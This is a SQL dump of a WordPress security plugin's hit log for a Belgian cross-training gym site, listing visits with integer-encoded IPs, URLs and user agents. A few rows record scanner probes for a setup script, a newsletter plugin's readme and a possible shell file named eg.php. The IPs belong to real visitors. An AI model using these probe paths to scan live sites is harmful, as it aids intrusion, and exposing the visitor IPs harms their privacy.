(73632, 1495777340.101462, 3024883600, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73633, 1495778197.422926, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73634, 1495779202.267367, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73635, 1495780096.045287, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73636, 1495780760.762730, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73637, 1495780761.360603, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73638, 1495780761.845293, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73639, 1495780762.329850, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73640, 1495780763.477716, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73641, 1495780764.017519, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73642, 1495780764.589355, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73643, 1495780765.121214, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73644, 1495780765.603063, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73645, 1495780766.141579, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73646, 1495780766.671462, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73647, 1495781929.521590, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73648, 1495785054.729152, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73649, 1495785055.277709, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73650, 1495785055.770070, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73651, 1495785056.333321, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73652, 1495785057.415255, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73653, 1495785057.932651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73654, 1495785058.594214, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73655, 1495785060.062171, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73656, 1495785060.531738, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73657, 1495785060.996587, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73658, 1495785061.492300, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73659, 1495786785.432399, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73660, 1495787384.975687, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73661, 1495789519.437893, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73662, 1495789520.034913, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73663, 1495789520.537817, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73664, 1495789521.015503, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73665, 1495789521.514379, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73666, 1495789521.979133, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73667, 1495789522.618645, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73668, 1495789523.159967, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73669, 1495789523.810490, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73670, 1495789524.294421, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73671, 1495789524.798243, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73672, 1495790144.566187, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73673, 1495793795.129115, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73674, 1495795305.469154, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73675, 1495799579.725151, 876183356, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(73676, 1495799584.272254, 876183356, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(73677, 1495799654.594737, 2637637405, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73678, 1495799655.064132, 2637637405, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73679, 1495802828.956059, 1834609551, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73680, 1495802830.615050, 1834609551, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73681, 1495802834.091687, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73682, 1495802837.088656, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73683, 1495802849.452117, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73684, 1495802851.074173, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73685, 1495802937.404529, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73686, 1495802939.060261, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73687, 1495802967.387085, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73688, 1495802968.893859, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73689, 1495812164.441999, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73690, 1495812165.907839, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73691, 1495812165.924033, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(73692, 1495812166.496631, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(73693, 1495822522.884971, 872366427, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73694, 1495829513.399134, 876055784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Java/1.8.0_121'),
(73695, 1495829662.186659, 2996485392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73696, 1495829666.242604, 2366145567, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73697, 1495837768.691682, 1338303462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73698, 1495842898.715886, 2637637509, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73699, 1495846583.181256, 2637637406, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73700, 1495846583.937402, 2637637406, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73701, 1495846584.617548, 2637637406, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73702, 1495847727.833893, 3098069115, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/web/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73703, 1495847955.707259, 3098069115, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73704, 1495848892.311467, 2303381350, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73705, 1495849449.920579, 657097413, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/index.php', 'http://crosstrainingcenter.be/wp-content/uploads/index.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73706, 1495850718.407675, 3281714129, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wysija-newsletters/readme.txt', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(73707, 1495857023.398466, 1338303462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73708, 1495866358.356047, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73709, 1495868783.657675, 1834609551, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73710, 1495868784.727632, 1834609551, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73711, 1495868786.524921, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73712, 1495868787.727944, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73713, 1495869441.382176, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73714, 1495869441.871866, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73715, 1495869442.369304, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73716, 1495869442.840005, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73717, 1495869443.335433, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73718, 1495869443.788055, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73719, 1495869444.509519, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73720, 1495869445.056427, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73721, 1495869445.486229, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73722, 1495869446.031231, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73723, 1495869446.451997, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73724, 1495876065.643273, 2809283056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73725, 1495876070.285797, 2809283056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73726, 1495876070.853843, 2809283056, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73727, 1495876071.414855, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73728, 1495876072.460006, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73729, 1495876073.637207, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73730, 1495876074.646517, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73731, 1495876075.699517, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73732, 1495876078.138635, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73733, 1495876079.158493, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73734, 1495876080.343851, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73735, 1495876081.384203, 2809283056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36'),
(73736, 1495877008.584190, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73737, 1495877009.062251, 1123632542, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(73738, 1495879501.251643, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/eg.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(73739, 1495880154.345309, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73740, 1495882685.874322, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73741, 1495885955.534448, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73742, 1495890889.203824, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73743, 1495893378.157248, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73744, 1495893378.737295, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73745, 1495893379.156047, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73746, 1495893379.605287, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73747, 1495893380.603747, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73748, 1495893381.025689, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73749, 1495893381.457593, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73750, 1495893382.356034, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73751, 1495893386.249511, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73752, 1495893386.673002, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73753, 1495893387.120702, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73754, 1495893387.919864, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73755, 1495893388.428769, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73756, 1495893389.055312, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73757, 1495899184.832765, 1053970098, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
